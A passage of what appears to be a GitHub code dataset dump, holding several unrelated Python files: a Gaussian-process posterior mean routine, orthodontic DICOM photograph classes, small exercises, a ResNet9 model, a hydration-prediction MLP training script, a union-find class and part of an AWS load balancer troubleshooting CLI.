trained) MuyGPS object.\n test_features:\n A matrix of shape `(test_count, feature_count)` whose rows consist\n of observation vectors of the test data.\n train_features:\n A matrix of shape `(train_count, feature_count)` whose rows consist\n of observation vectors of the train data.\n nbrs_lookup:\n A data structure supporting nearest neighbor queries into\n `train_features`.\n train_targets:\n A matrix of shape `(train_count, response_count)` whose rows consist\n of response vectors of the train data.\n\n\n Returns\n -------\n posterior_mean:\n The predicted response associated with each test observation.\n precomputed_coefficients_matrix:\n A matrix of shape `(train_count, nn_count)` whose rows list the\n precomputed coefficients for each nearest neighbors set in the\n training data.\n timing:\n A dictionary containing timings for the training, precomputation,\n nearest neighbor computation, and prediction.\n\n \"\"\"\n time_start = perf_counter()\n (\n precomputed_coefficients_matrix,\n nn_indices,\n ) = _decide_and_make_fast_regressor(\n muygps,\n nbrs_lookup,\n train_features,\n train_targets,\n )\n time_precomp = perf_counter()\n\n time_agree = perf_counter()\n nn_indices = fast_nn_update(nn_indices)\n\n test_neighbors, _ = nbrs_lookup.get_nns(test_features)\n time_nn = perf_counter()\n\n closest_neighbor = test_neighbors[:, 0]\n closest_set_new = nn_indices[closest_neighbor, :].astype(int)\n num_test_samples, _ = test_features.shape\n\n posterior_mean = fast_posterior_mean_from_indices(\n muygps,\n mm.arange(0, num_test_samples),\n closest_set_new,\n test_features,\n train_features,\n closest_neighbor,\n precomputed_coefficients_matrix,\n )\n time_pred = perf_counter()\n\n timing = {\n \"precompute\": time_precomp - time_start,\n \"agree\": time_agree - time_precomp,\n \"nn\": time_nn - time_agree,\n \"pred\": time_pred - time_nn,\n }\n\n return 
posterior_mean, precomputed_coefficients_matrix, timing\n","repo_name":"bwpriest/MuyGPyS","sub_path":"MuyGPyS/examples/fast_posterior_mean.py","file_name":"fast_posterior_mean.py","file_ext":"py","file_size_in_byte":13023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"9152204116","text":"# pylint: disable=invalid-name\n''' Orthodontic Photograph Classes.\n\nAdds SNOMED CT codes in DICOM object for Orthodontic Views.\n\n'''\n\nimport logging\nfrom datetime import datetime\nfrom pydicom.sequence import Sequence\nfrom pydicom.dataset import Dataset\n\nfrom dicom4ortho.model import PhotographBase\nimport dicom4ortho.m_tooth_codes as ToothCodes\nfrom dicom4ortho import defaults\nfrom dicom4ortho.m_ada1107 import ADA1107\n\nALLOWED_TEETH = {\n \"EV01\": [],\n \"EV02\": [],\n \"EV03\": [],\n \"EV04\": [],\n \"EV05\": [],\n \"EV06\": [],\n \"EV07\": [],\n \"EV08\": [],\n \"EV09\": [],\n \"EV10\": [],\n \"EV11\": [],\n \"EV12\": [],\n \"EV13\": [],\n \"EV14\": [],\n \"EV15\": [],\n \"EV16\": [],\n \"EV17\": [],\n \"EV18\": [],\n \"EV19\": [],\n \"EV20\": [],\n \"EV21\": [],\n \"EV22\": [],\n \"EV23\": [],\n \"EV24\": [],\n \"EV25\": [],\n \"EV26\": [],\n \"EV27\": [],\n \"EV28\": [],\n \"EV29\": [],\n \"EV30\": [],\n \"EV31\": [],\n \"EV32\": [],\n \"EV33\": [],\n \"EV34\": [],\n \"EV35\": [],\n \"EV36\": [],\n \"EV37\": [],\n \"EV38\": [],\n \"EV39\": [],\n \"EV40\": [],\n \"EV41\": [],\n \"EV42\": [],\n \"EV43\": [],\n\n \"IV01\": [\n '11', '12', '13', '14', '15', '16', '17', '18',\n '41', '42', '43', '44', '45', '46', '47', '48',\n ],\n \"IV02\": [\n '11', '12', '13', '14', '15', '16', '17', '18',\n '41', '42', '43', '44', '45', '46', '47', '48',\n ],\n \"IV03\": [],\n \"IV04\": [],\n \"IV05\": [],\n \"IV06\": [],\n \"IV07\": [],\n \"IV08\": [],\n \"IV09\": [],\n \"IV10\": [],\n \"IV11\": [],\n \"IV12\": [],\n \"IV13\": [],\n \"IV14\": [],\n \"IV15\": [],\n \"IV16\": [],\n \"IV17\": [],\n \"IV18\": [\n '21', '22', '23', '24', '15', '26', '27', '28',\n '31', '32', '33', '34', '35', '36', '37', '38',\n ],\n \"IV19\": [\n '21', '22', '23', '24', '15', '26', '27', '28',\n '31', '32', '33', '34', '35', '36', '37', '38',\n ],\n \"IV20\": [],\n \"IV21\": [],\n \"IV22\": [],\n \"IV23\": [],\n \"IV24\": [],\n \"IV25\": [],\n \"IV26\": [],\n \"IV27\": [],\n \"IV28\": [],\n \"IV29\": [],\n \"IV30\": [],\n\n}\n\n\nclass OrthodonticPhotograph(PhotographBase):\n \"\"\" An Orthodontic Photograph as defined in WP-1100\n\n arguments:\n\n image_type: a 4 digit ortho photo type code as specified in WP-1100. Ex. EV01\n\n input_image_filename: name of input image file\n\n output_image_filename: name of output image file\n \"\"\"\n type_keyword = \"\" # Orthodontic View String, e.g. 
\"IV03\"\n ada1107_view = None # Row in ADA-1107 views.csv for this particular view\n teeth = None\n treatment_event_type = None\n days_after_event = None\n\n def __init__(self, **metadata):\n super().__init__(**metadata)\n self.ada1107 = ADA1107()\n self.teeth = metadata.get('teeth')\n if metadata.get('image_type') is not None:\n # Allow for both dash separated and not separated naming\n self.type_keyword = metadata.get('image_type').replace('-', '')\n self.ada1107_view = self.ada1107.VIEWS.get(self.type_keyword)\n\n patient_birthdate = metadata.get('patient_birthdate')\n if patient_birthdate is not None:\n try:\n self.patient_birthdate = datetime.strptime(patient_birthdate, defaults.IMPORT_DATE_FORMAT).date()\n except (ValueError, TypeError):\n logging.warn(f\"Invalid Patient Birthdate {patient_birthdate}\")\n \n self.study_instance_uid = metadata.get('study_instance_uid')\n self.study_description = metadata.get('study_description')\n self.series_instance_uid = metadata.get('series_instance_uid')\n self.series_description = metadata.get('series_description')\n self.patient_firstname = metadata.get('patient_firstname','')\n self.patient_lastname = metadata.get('patient_lastname','')\n self.patient_id = metadata.get('patient_id','')\n self.patient_sex = metadata.get('patient_sex','')\n self.dental_provider_firstname = metadata.get('dental_provider_firstname','')\n self.dental_provider_lastname = metadata.get('dental_provider_lastname','')\n self.equipment_manufacturer = metadata.get('manufacturer')\n self.treatment_event_type = metadata.get('treatment_event_type')\n self.days_after_event = metadata.get('days_after_event')\n\n # TODO: extract this to a higher level to give the user the ability to set it when needed.\n # See https://github.com/open-ortho/dicom4ortho/issues/16\n self._ds.BurnedInAnnotation = metadata.get('burned_in_annotation','NO')\n \n # this hardcoding might not be ideal here. But for all orthodontic photography purposes that i am aware of, this is always DSC. These could come from EXIF. See https://dicom.nema.org/medical/dicom/current/output/chtml/part17/chapter_NNNN.html but they might not. The code here should \n self._ds.SceneType = 1 # Digital Still Camera (DSC): direct image capture\n self._ds.FileSource = 3 # Digital Still Camera (DSC)\n \n # TODO: extract this to a higher level to give the user the ability to set it when needed.\n # Use when the staff is taking test shots. Then it is not expected for the view in question to actually show the correct view for the patient.\n # See http://dicom.nema.org/medical/dicom/current/output/chtml/part03/sect_C.7.6.12.html#sect_C.7.6.12 . In these cases, the Phantom would have to go in the Device Sequence. For regular usage, we should safely be able to set this to 'NO'.\n # See https://github.com/open-ortho/dicom4ortho/issues/15\n self._ds.QualityControlImage = 'NO'\n\n def _get_code_dataset(self, ada1107_code_keyword) -> Dataset:\n \"\"\" Construct a DICOM Dataset from a row in the codes.csv of ADA1107 \n\n ada1107_code must be a dictionary with the following keys:\n code\n codeset\n meaning\n \"\"\"\n ada1107_code = self.ada1107.CODES.get(ada1107_code_keyword)\n if ada1107_code == None:\n logging.warning(f\"Keyword [{ada1107_code_keyword}] did not match any code. 
Skipping.\")\n return None\n code_dataset = Dataset()\n code_dataset.CodeMeaning = ada1107_code.get(\n 'meaning')[:64] # LO only allows 64 characters\n code_dataset.CodeValue = ada1107_code.get('code')\n code_dataset.CodingSchemeDesignator = ada1107_code.get('codeset')\n return code_dataset\n\n def _get_code_sequence(self, ada1107_code_keyword) -> Sequence:\n code_dataset = self._get_code_dataset(ada1107_code_keyword)\n if code_dataset is None:\n return None\n return Sequence([code_dataset])\n\n def _set_dicom_attributes(self):\n # Get the array of functions to set this required type.\n logging.debug(f'Setting DICOM attributes for {self.type_keyword}')\n\n # Make a nice comment from keyword and description\n ImageComments = f\"{self.type_keyword}^{self.ada1107_view.get('ImageComments')}\"\n\n # NBSP character OxA0 is not allowed in Image Comments. Replace with a\n # Space (0x20)\n self._ds.ImageComments = ImageComments.replace('\\xa0', '\\x20')\n self._ds.SeriesDescription = self.ada1107_view.get('SeriesDescription')\n\n\n patient_orientation_code = self.ada1107.CODES.get(self.ada1107_view.get('PatientOrientation'))\n if patient_orientation_code is None: \n patient_orientation_code = self.ada1107.CODES.get('OrientationFront')\n logging.warning(f\"PatientOrientation not found for {self.output_image_filename}. Defaulting to {patient_orientation_code}\")\n self._ds.PatientOrientation = patient_orientation_code.get('code').split('^')\n self._ds.ImageLaterality = self.ada1107.CODES.get(\n self.ada1107_view.get('ImageLaterality')).get('code')\n\n self.add_device()\n self.add_anatomic_region()\n self.add_view_code()\n self.add_primary_anatomic_structure()\n self.add_acquisition_context()\n # self.add_teeth()\n\n def add_acquisition_context(self):\n def add_progress():\n if self.treatment_event_type and self.days_after_event:\n acs_ds = Dataset()\n acs_ds.ValueType = 'CODE'\n acs_ds.ConceptNameCodeSequence = self._get_code_sequence(\"TemporalEventType\") \n acs_ds.ConceptCodeSequence = self._get_code_sequence(self.treatment_event_type)\n AcquisitionContextSequence.append(acs_ds)\n\n acs_ds = Dataset()\n acs_ds.ValueType = 'NUMERIC'\n acs_ds.ConceptNameCodeSequence = self._get_code_sequence(\"OffsetFromEvent\") \n acs_ds.MeasurementUnitsCodeSequence = self._get_code_sequence(\"day\")\n acs_ds.NumericValue = self.days_after_event\n AcquisitionContextSequence.append(acs_ds)\n\n AcquisitionContextSequence = Sequence([])\n # Find all columns which start with AcquisitionContextSequence in ada1107_view\n for index, key in enumerate(self.ada1107_view):\n if key.startswith(\"AcquisitionContextSequence\"):\n concept_name = key.split(\"^\")[1]\n concept_name_code_sequence = self._get_code_sequence(\n concept_name)\n for concept_code in self.ada1107_view.get(key).split(\"^\"):\n if concept_code != \"na\" and len(concept_code) > 0:\n acs_ds = Dataset()\n acs_ds.ValueType = 'CODE'\n acs_ds.ConceptNameCodeSequence = concept_name_code_sequence\n acs_ds.ConceptCodeSequence = self._get_code_sequence(concept_code)\n AcquisitionContextSequence.append(acs_ds)\n add_progress()\n self._ds.AcquisitionContextSequence = AcquisitionContextSequence\n\n def add_device(self):\n DeviceSequence = Sequence([])\n for device in self.ada1107_view.get('DeviceSequence').split(\"^\"):\n if device != \"na\" and len(device) > 0:\n DeviceSequence.append(self._get_code_dataset(device))\n # The AnatomicRegionModifierSequence must be part of AnatomicRegionSequence\n if (len(DeviceSequence) > 0):\n self._ds.DeviceSequence = DeviceSequence\n\n 
def add_anatomic_region(self):\n # AnatomicRegionSequence allows for a single value\n self._ds.AnatomicRegionSequence = self._get_code_sequence(\n self.ada1107_view.get('AnatomicRegionSequence'))\n\n # More than one AnatomicRegionModifierSequence are allowed\n AnatomicRegionModifierSequence = Sequence([])\n for arm in self.ada1107_view.get('AnatomicRegionModifierSequence').split(\"^\"):\n if arm != \"na\" and len(arm) > 0:\n AnatomicRegionModifierSequence.append(self._get_code_dataset(arm))\n # The AnatomicRegionModifierSequence must be part of AnatomicRegionSequence\n if (len(AnatomicRegionModifierSequence) > 0):\n self._ds.AnatomicRegionSequence[0].AnatomicRegionModifierSequence = AnatomicRegionModifierSequence\n\n def add_view_code(self):\n \"\"\" Identical function as add_anatomic_region()\n \"\"\"\n # ViewCodeSequence allows for a single value\n self._ds.ViewCodeSequence = self._get_code_sequence(\n self.ada1107_view.get('ViewCodeSequence'))\n\n # More than one AnatomicRegionModifierSequence are allowed\n ViewModifierCodeSequence = Sequence([])\n for vmcs in self.ada1107_view.get('ViewModifierCodeSequence').split(\"^\"):\n if vmcs != \"na\" and len(vmcs) > 0:\n ViewModifierCodeSequence.append(self._get_code_dataset(vmcs))\n # The AnatomicRegionModifierSequence must be part of AnatomicRegionSequence\n if (len(ViewModifierCodeSequence) > 0):\n self._ds.ViewCodeSequence[0].ViewModifierCodeSequence = ViewModifierCodeSequence\n\n def add_primary_anatomic_structure(self):\n # PrimaryAnatomicStructureSequence allows for multiple values, but currently only one is supported by this code.\n pas = self.ada1107_view.get('PrimaryAnatomicStructureSequence')\n if pas != \"na\" and len(pas) > 0:\n self._ds.PrimaryAnatomicStructureSequence = self._get_code_sequence(\n pas)\n\n # More than one AnatomicRegionModifierSequence are allowed\n PrimaryAnatomicStructureModifierSequence = Sequence([])\n for pasm in self.ada1107_view.get('PrimaryAnatomicStructureModifierSequence').split(\"^\"):\n if pasm != \"na\" and len(pasm) > 0:\n PrimaryAnatomicStructureModifierSequence.append(\n self._get_code_dataset(pasm))\n # The AnatomicRegionModifierSequence must be part of AnatomicRegionSequence\n if (len(PrimaryAnatomicStructureModifierSequence) > 0):\n self._ds.PrimaryAnatomicStructureSequence[\n 0].PrimaryAnatomicStructureModifierSequence = PrimaryAnatomicStructureModifierSequence\n\n def add_teeth(self):\n teeth = self.teeth\n logging.debug(\"Adding teeth\")\n if teeth == defaults.ADD_MAX_ALLOWED_TEETH:\n logging.debug(\"Setting all possibly allowed teeth.\")\n teeth = ALLOWED_TEETH[self.type_keyword]\n\n if len(teeth) > 0:\n if not hasattr(self._ds, 'PrimaryAnatomicStructureSequence'):\n self._ds.PrimaryAnatomicStructureSequence = Sequence([])\n\n for tooth in teeth:\n if ToothCodes.is_valid_tooth_number(tooth):\n self._ds.PrimaryAnatomicStructureSequence.append(\n self._get_code_dataset(*ToothCodes.SCT_TOOTH_CODES[tooth]))\n\n def is_extraoral(self) -> bool:\n if self.type_keyword.startswith(\"EV\"):\n return True\n else:\n return False\n\n def is_intraoral(self) -> bool:\n if self.type_keyword.startswith(\"IV\"):\n return True\n else:\n return False\n\n def save(self, filename=None):\n filename = filename or self.output_image_filename\n self.set_image()\n self._set_dicom_attributes()\n \n # We cannot save without UIDs. 
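(Study Instance UID and Series Instance UID are mandatory identifiers in DICOM, so a file without them would not be valid.)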
If the user hasn't added them, we must do so now.\n if self._ds.StudyInstanceUID is None:\n self._ds.StudyInstanceUID = defaults.generate_dicom_uid()\n if self._ds.SeriesInstanceUID is None:\n self._ds.SeriesInstanceUID = defaults.generate_dicom_uid()\n \n self._ds.save_as(filename=filename, write_like_original=False)\n logging.info(f\"File [{filename}] saved.\")\n\n\nclass OrthodonticSeries():\n \"\"\" Class representing an Orthodontic Photo session.\n\n Examples of orthodontic series:\n\n * A set of intra-oral photographs take on the same day for the same appointment.\n * A set of extra-oral photographs take on the same day for the same appointment.\n\n \"\"\"\n # SeriesInstanceUID\n UID = None\n StudyUID = None\n\n Photos = None\n\n def __init__(self, **kwargs) -> None:\n \"\"\" New Orthodontic Series\n\n :uid: The Series DICOM UID. Defaults to generating a new one.\n :description: The Series Description to add to all photos.\n \"\"\"\n self.description = kwargs.get(\"description\")\n self.UID = kwargs.get(\"uid\") or defaults.generate_dicom_uid()\n self.Photos = []\n\n def __len__(self):\n return len(self.Photos)\n\n def add(self, photo: OrthodonticPhotograph) -> None:\n self.Photos.append(photo)\n\n def save(self) -> None:\n logging.info(\n f\"Requested to save {len(self.Photos)} Photos within Series {self.UID}\")\n for photo in self.Photos:\n photo.series_description = self.description\n photo.series_instance_uid = self.UID\n photo.study_instance_uid = self.StudyUID\n photo.save()\n\n\nclass OrthodonticStudy():\n \"\"\" Class representing an Orthodontic Photo visit.\n\n Examples of orthodontic study:\n\n * As part of the same appointment/visit/encounter, the staff takes intraoral and extraoral photographs of the patient. While the intraoral and the extra oral are in separate series, they are both part of the same study.\n * During the same day an X-Ray is taken, that would go in a separate Study.\n\n \"\"\"\n # SeriesInstanceUID\n UID = None\n Series = None\n\n def __init__(self, **kwargs) -> None:\n \"\"\" New Orthodontic Study\n\n :uid: The Series DICOM UID. 
Defaults to generating a new one.\n        :description: The Study Description to add to all photos.\n        \"\"\"\n        self.UID = kwargs.get(\"uid\") or defaults.generate_dicom_uid()\n        self.Series = []\n\n    def __len__(self):\n        return len(self.Series)\n\n    def add(self, serie: OrthodonticSeries) -> None:\n        serie.StudyUID = self.UID\n        self.Series.append(serie)\n\n    def save(self) -> None:\n        logging.info(\n            f\"Requested to save {len(self.Series)} Series within Study {self.UID}\")\n        for serie in self.Series:\n            serie.save()\n","repo_name":"open-ortho/dicom4ortho","sub_path":"dicom4ortho/m_orthodontic_photograph.py","file_name":"m_orthodontic_photograph.py","file_ext":"py","file_size_in_byte":17082,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"34744689174","text":"#Pig Latin\r\n\r\nvowels = ['a','e','i','o','u']\r\n\r\n#easier to use an extra function to apply to both names\r\ndef pig(w):\r\n    #get rid of uppercase so it doesn't get in the way\r\n    w = w.lower()\r\n    pigw = ''\r\n    #make word a list so accessing each letter is easier\r\n    lw = list(w)\r\n    if lw[0] in vowels:\r\n        #if first letter is a vowel, pigword is just normal word + yay\r\n        pigw += w + 'yay'\r\n    else:\r\n        #note the first letter and get rid of it\r\n        fletter = lw[0]\r\n        lw.remove(fletter)\r\n        #make the list back into a string\r\n        pigw += ''.join(lw)\r\n        #add back on the first letter as well as ay\r\n        pigw += fletter + 'ay'\r\n    return pigw\r\n\r\ndef nameToPig(f,l):\r\n    return [pig(f),pig(l)]\r\n\r\nprint(nameToPig(\"Tyler\",\"Andrews\"))\r\nprint(nameToPig(\"Barack\",\"Obama\"))\r\n","repo_name":"andre205/CPSC230","sub_path":"TAndrews_Assignment9/Piglatin.py","file_name":"Piglatin.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36035671221","text":"import os\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom utils_funcs import to_device, accuracy, conv_block\n\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\nimport pygame\n\nclass Car:\n    def __init__(self, env):\n        \"\"\"\n        Initialize the Car class.\n\n        Args:\n            env: MountainCar-v0 environment\n        \"\"\"\n        # Action size = 3\n        # Go left, Go right, Don't move\n        self.action_size = env.action_space.n\n        print(f\"MountainCar-v0 action size: {self.action_size}\")\n\n        # Define actions in a key map\n        self.KEY_MAPPING = {\n            pygame.K_LEFT: 0,  # Accelerating to the left: Action(0)\n            pygame.K_RIGHT: 2,  # Accelerating to the right: Action(2)\n            pygame.K_DOWN: 1,  # No acceleration: Action(1)\n        }\n\n    def get_action(self, pressed_key):\n        \"\"\"\n        Map pressed key to a corresponding action.\n\n        Args:\n            pressed_key: Key code of the pressed key\n\n        Returns:\n            int: Action corresponding to the pressed key\n        \"\"\"\n        # Set default behavior to DOWN button. 
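Using dict.get with a default avoids a\n        # KeyError for unmapped keys. 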
This way the mountain car won't move if\n # no signal is detected.\n return self.KEY_MAPPING.get(pressed_key, self.KEY_MAPPING[pygame.K_DOWN])\n\nclass DeviceDataLoader:\n \"\"\"\n Utility class to move batches of data to a desired device.\n \"\"\"\n def __init__(self, data_loader, device):\n self.data_loader = data_loader\n self.device = device\n\n def __iter__(self):\n \"\"\"Yield a batch of data after moving it to device\"\"\"\n for batch in self.data_loader:\n yield to_device(batch, self.device)\n\n def __len__(self):\n \"\"\"\n Returns the number of batches in the DataLoader.\n \"\"\"\n return len(self.data_loader)\n\n\nclass ImageClassificationBase(nn.Module):\n \"\"\"\n Base class for image classification tasks. Provides methods for training and validation steps.\n \"\"\"\n def training_step(self, batch):\n \"\"\"\n Compute the loss for a batch of training data.\n\n Args:\n batch (tuple): A tuple containing images and their respective labels.\n\n Returns:\n torch.Tensor: The computed loss.\n \"\"\"\n images, labels = batch\n out = self(images) # Generate predictions\n loss = F.cross_entropy(out, labels) # Calculate loss\n return loss\n\n def validation_step(self, batch):\n \"\"\"\n Compute the loss and accuracy for a batch of validation data.\n\n Args:\n batch (tuple): A tuple containing images and their respective labels.\n\n Returns:\n dict: A dictionary containing the computed validation loss and accuracy.\n \"\"\"\n images, labels = batch\n out = self(images) # Generate predictions\n loss = F.cross_entropy(out, labels) # Calculate loss\n acc = accuracy(out, labels) # Calculate accuracy\n return {\"val_loss\": loss.detach(), \"val_acc\": acc}\n\n def validation_epoch_end(self, outputs):\n \"\"\"\n Compute the average validation loss and accuracy over an epoch.\n\n Args:\n outputs (list): List of dictionaries containing individual batch losses and accuracies.\n\n Returns:\n dict: A dictionary containing the average validation loss and accuracy for the epoch.\n \"\"\"\n batch_losses = [x[\"val_loss\"] for x in outputs]\n epoch_loss = torch.stack(batch_losses).mean() # Combine losses\n batch_accs = [x[\"val_acc\"] for x in outputs]\n epoch_acc = torch.stack(batch_accs).mean() # Combine accuracies\n return {\"val_loss\": epoch_loss.item(), \"val_acc\": epoch_acc.item()}\n\n def epoch_end(self, epoch, result):\n \"\"\"\n Print the results at the end of an epoch.\n\n \"\"\"\n print(\n \"Epoch [{}], last_lr: {:.5f}, train_loss: {:.4f}, val_loss: {:.4f}, val_acc: {:.4f}\".format(\n epoch,\n result[\"lrs\"][-1],\n result[\"train_loss\"],\n result[\"val_loss\"],\n result[\"val_acc\"],\n )\n )\n\nclass ResNet9(ImageClassificationBase):\n \"\"\"\n A simplified implementation of the ResNet-9 architecture for image classification.\n \"\"\"\n def __init__(self, num_classes, in_channels=3):\n \"\"\"\n Initialize the ResNet9 model.\n\n Args:\n num_classes (int): Number of output classes.\n in_channels (int, optional): Number of input channels. 
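Use 1 for grayscale inputs. 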
Default is 3 (RGB).\n \"\"\"\n super().__init__()\n\n self.conv1 = conv_block(in_channels, 64)\n self.conv2 = conv_block(64, 128, pool=True)\n self.res1 = nn.Sequential(conv_block(128, 128), conv_block(128, 128))\n\n self.conv3 = conv_block(128, 256, pool=True)\n self.conv4 = conv_block(256, 512, pool=True)\n self.res2 = nn.Sequential(conv_block(512, 512), conv_block(512, 512))\n\n self.classifier = nn.Sequential(\n nn.AdaptiveMaxPool2d(1),\n nn.Flatten(),\n nn.Dropout(0.2),\n nn.Linear(512, num_classes),\n )\n\n def forward(self, batch):\n \"\"\"\n Forward pass of the ResNet9 model.\n\n Args:\n batch (torch.Tensor): The input tensor.\n\n Returns:\n torch.Tensor: The output tensor after passing through the model.\n \"\"\"\n out = self.conv1(batch)\n out = self.conv2(out)\n out = self.res1(out) + out # Residual connection\n out = self.conv3(out)\n out = self.conv4(out)\n out = self.res2(out) + out # Residual connection\n out = self.classifier(out)\n return out\n","repo_name":"hbaghramyan/hand_gesture_mountain_car","sub_path":"utils_classes.py","file_name":"utils_classes.py","file_ext":"py","file_size_in_byte":5667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39136609133","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'findDigits' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts INTEGER n as parameter.\n#\n\ndef findDigits(n):\n count = 0\n act_n = n\n while n > 0:\n digit = n % 10\n if digit != 0:\n if act_n % digit == 0:\n count = count + 1\n n = n // 10\n return count\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n t = int(input().strip())\n\n for t_itr in range(t):\n n = int(input().strip())\n\n result = findDigits(n)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"burcia1711/hackerrank","sub_path":"problem solving/algorithms/sequenceEquation.py","file_name":"sequenceEquation.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13016198039","text":"import time\nimport torch\nfrom params.mlp_params import config\nfrom models.mlp_model import HydrationNN\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom train.mlp_train_modules import train_loop, validation_loop\nfrom datasets.mlp_dataset import TrainingEmbeddingLoader, ValidationEmbeddingLoader\nfrom utils.utils import shuffle_along_axis, write_loss, save_checkpoint, load_checkpoint, save_metrics\n\n\ndef main():\n torch.set_num_threads(1)\n #To save accuracy metrics\n writer = SummaryWriter(f'./checkpoints/mlp/report/')\n #Load training data\n train_dataset = TrainingEmbeddingLoader(config.train_dataset_path, config.train_dataset_list)\n #Load validation data and shuffle once\n validation_dataset = ValidationEmbeddingLoader(config.validation_dataset_path, config.validation_dataset_list, shuffle=True)\n #Shuffle\n shuffle_time = time.time()\n train_dataset.x = shuffle_along_axis(train_dataset.x, 1)\n #Define loaders\n train_loader = DataLoader(train_dataset, batch_size=config.training_batch_size, shuffle=config.shuffle, num_workers=config.num_workers, pin_memory = config.pin_memory)\n validation_loader = DataLoader(validation_dataset, batch_size=1, shuffle=False, num_workers=config.num_workers, pin_memory = config.pin_memory)\n print(f'Train dataset shuffling took 
{round(time.time()-shuffle_time,1)} seconds.')\n    #Initialize model\n    model = HydrationNN(config.first_part_features, config.second_part_features, config.dropout_p)\n    #Define optimizer\n    model_params = list(model.parameters())\n    config.optimizer = config.optim_algorithm(model_params, lr=config.learning_rate, weight_decay=config.weight_dec)\n    #Load model\n    if config.load_model:\n        epoch = config.starting_epoch-1\n        load_checkpoint(torch.load(config.load_model, map_location=config.device), model, epoch)\n    #Use all available GPUs if you want\n    if config.parallel:\n        if torch.cuda.device_count() > 1:\n            print(f\"Let's use {torch.cuda.device_count()} GPUs!\")\n            model = torch.nn.DataParallel(model)\n    model.to(config.device)\n    for epoch in range(config.starting_epoch, config.starting_epoch+config.num_epochs):\n        #Train your models\n        epoch_loss = train_loop(train_loader, model, config)\n        #Write loss to tensorboard report\n        write_loss(writer, epoch_loss, epoch)\n        #Save models every 5 epochs.\n        if not (epoch+1)%5:\n            #Save model checkpoints according to training devices.\n            if config.parallel:\n                model_checkpoint = {\"state_dict\": model.module.state_dict()}\n            else:\n                model_checkpoint = {\"state_dict\": model.state_dict()}\n            #Save it\n            save_checkpoint(model_checkpoint, epoch, filename=f'./checkpoints/mlp/HydrationNN_epoch_{epoch}.pth.tar')\n        #After epoch 20 start evaluation\n        if (epoch+1) >= 20:\n            #Evaluate models with validation set.\n            recall, precision, F1, selected_cap_value, validation_epoch_loss = validation_loop(validation_loader, model, epoch, config)\n            #And save metrics\n            save_metrics(config.thresholds, writer, recall, precision, F1, selected_cap_value, 'validation', epoch)\n        #Every 5 epochs also shuffle training embedding\n        shuffle_time = time.time()\n        train_dataset.x = shuffle_along_axis(train_dataset.x, 1)\n        #Redefine loaders\n        train_loader = DataLoader(train_dataset, batch_size=config.training_batch_size, shuffle=config.shuffle, num_workers=config.num_workers, pin_memory = config.pin_memory)\n        print(f'Train dataset shuffling took {round(time.time()-shuffle_time,1)} seconds.')\n    writer.close()\n    return\n\nif __name__ == '__main__':\n    main()\n","repo_name":"azamanos/HydraProt","sub_path":"train_mlp.py","file_name":"train_mlp.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28098576046","text":"# Disjoint Set Data Structure with Rank and Path Compression\n\nclass UnionFind:\n    def __init__(self, size):\n        self.root = list(range(size))\n        self.rank = [0] * size\n\n    def find(self, x):\n        if self.root[x] != x:\n            self.root[x] = self.find(self.root[x])\n        return self.root[x]\n\n    def union(self, x, y):\n        x_set, y_set = self.find(x), self.find(y)\n        if x_set == y_set:\n            return\n        if self.rank[x_set] > self.rank[y_set]:\n            self.root[y_set] = x_set\n        elif self.rank[x_set] < self.rank[y_set]:\n            self.root[x_set] = y_set\n        else:\n            self.root[y_set] = x_set\n            self.rank[x_set] += 1\n\n    def connected(self, x, y):\n        return self.find(x) == self.find(y)\n
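\n# Usage sketch (illustrative, not part of the original file):\n#   uf = UnionFind(4)\n#   uf.union(0, 1)\n#   uf.connected(0, 1)  # True\n#   uf.connected(0, 2)  # False\n","repo_name":"IanLiuTW/codebase","sub_path":"Data Structure/Union Find/union_find.py","file_name":"union_find.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2883336566","text":"from __future__ import print_function, unicode_literals\nfrom elb_doctor.lib.elb.get_elbs import GetElbs\nfrom elb_doctor.lib.elb.parse_elbs import ParseElbs\nfrom 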
elb_doctor.lib.tgs.getTargetHealth import getTargetHealth\nfrom elb_doctor.lib.tgs.parseTgHealth import parseTgHealth\nfrom elb_doctor.lib.helpers.utilities import output_renderer\nfrom PyInquirer import prompt\nfrom elb_doctor.lib.helpers.regions import standard_regions,other_regions\nfrom elb_doctor.lib.helpers.elbtypes import elb_types\nfrom elb_doctor.api.elb_doctor_api import ElbDoctorApi\n\n\n\ndef main():\n\n # get_elb = GetElbs()\n api = ElbDoctorApi()\n # parse_elbs = ParseElbs()\n\n questions = [\n {\n 'type': 'list',\n 'name': 'standard_regions',\n 'message': 'What is the AWS region of your ELB?',\n 'choices': standard_regions,\n 'default': 'us-east-1'\n },\n {\n 'type': 'list',\n 'name': 'other_regions',\n 'message': 'Is your ELB in any of the following Opt-in/GovCloud/China region?',\n 'choices': other_regions,\n 'when': lambda answers: answers['standard_regions'] == False\n },\n {\n 'type': 'list',\n 'name': 'elb_type',\n 'message': 'What is the type of your ELB?',\n 'choices': elb_types\n },\n {\n 'type': 'list',\n 'name': 'elb',\n 'message': 'Which CLB are you having issue with?',\n 'choices': api.retrieve_clbs,\n 'when': lambda answers: answers['elb_type'] == 'classic'\n },\n {\n 'type': 'list',\n 'name': 'elb',\n 'message': 'Which ALB are you having issue with?',\n 'choices': api.retrieve_elbv2, #currently there is no better way to call parse_elbs.parse_albs, parse_elbs.parse_nlbs or parse_elbs.parse_gwlbs other than 